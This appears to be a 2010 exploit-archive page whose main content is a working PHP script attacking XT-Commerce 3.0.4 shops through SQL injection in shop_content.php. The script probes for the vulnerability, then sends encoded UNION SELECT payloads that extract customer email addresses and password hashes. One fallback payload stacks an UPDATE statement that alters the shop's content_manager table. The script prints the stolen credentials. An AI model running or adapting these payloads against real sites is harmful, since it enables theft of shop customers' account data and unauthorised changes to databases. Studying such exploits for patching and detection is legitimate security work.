XT-Commerce Version 3.0.4 SQL Injection Exploit
Posted on 26 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>XT-Commerce Version 3.0.4 SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== XT-Commerce Version 3.0.4 SQL Injection Exploit =============================================== <?php # Exploit Title: XT-Commerce # Date: 25/7/2010 # Author: TA4G - S8T@hotmail.com # Software Link: http://www.xt-commerce.info/index.php?_m=downloads&_a=viewdownload&downloaditemid=19 # Version: 3.0.4 # Google dork : n/a # Platform / Tested on: Ubuntu Linux # Category: webapps/0day -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gr33tz to ### ArHack.NeT ### -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= $check_vuln = file_get_contents($argv[1]."shop_content.php/coID/-1'"); if(strpos($check_vuln,"You have an error in your SQL syntax") != false) { print("Site is exploitable. "); } else { $getCont = file_get_contents($argv[1]); if(strpos($getCont,"xt:Commerce") == false)//Check if xt:commerce software { print("Copyright of software not found. "); print("Site is not exploitable. "); exit(0); } else { print("Site is not exploitable. "); print("Exploiting stopped. "); exit(0); } } $innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%20% 271"); if(strpos($innerHTML,"You have an error in your SQL syntax") != false) { $innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 20200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D% 20%271"); } if(strpos($innerHTML,"You have an error in your SQL syntax") != false) { $innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat% 28customers_email_address%2C0x3b%2Ccustomers_password%2C0x3b%29%20from%20customers%20limit% 200%2C1%3B--%20UPDATE%20content_manager%20SET%20languages_id%20%3D%20%272%27% 20where%205%3D%271"); } //split of return $innerTitle = substr($innerHTML,strpos($innerHTML,"<title>")+7,(strpos($innerHTML,"</title>")-(strpos ($innerHTML,"<title>")+7))); if(strpos($innerTitle,";") != false) { $innerUser = substr($innerTitle,0,strpos($innerTitle,";")); $innerMD5 = substr($innerTitle,strpos($innerTitle,";")+1,strlen($innerTitle)); $innerMD5 = substr($innerMD5,0,strpos($innerMD5,";")); print("Username: "); print($innerUser." "); if(strlen($innerMD5)==32) { print("Hash is MD5: "); print($innerMD5." "); } else { print("Is not MD5: "); print($innerMD5." "); } } else { print("Error, stop executing. "); } ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
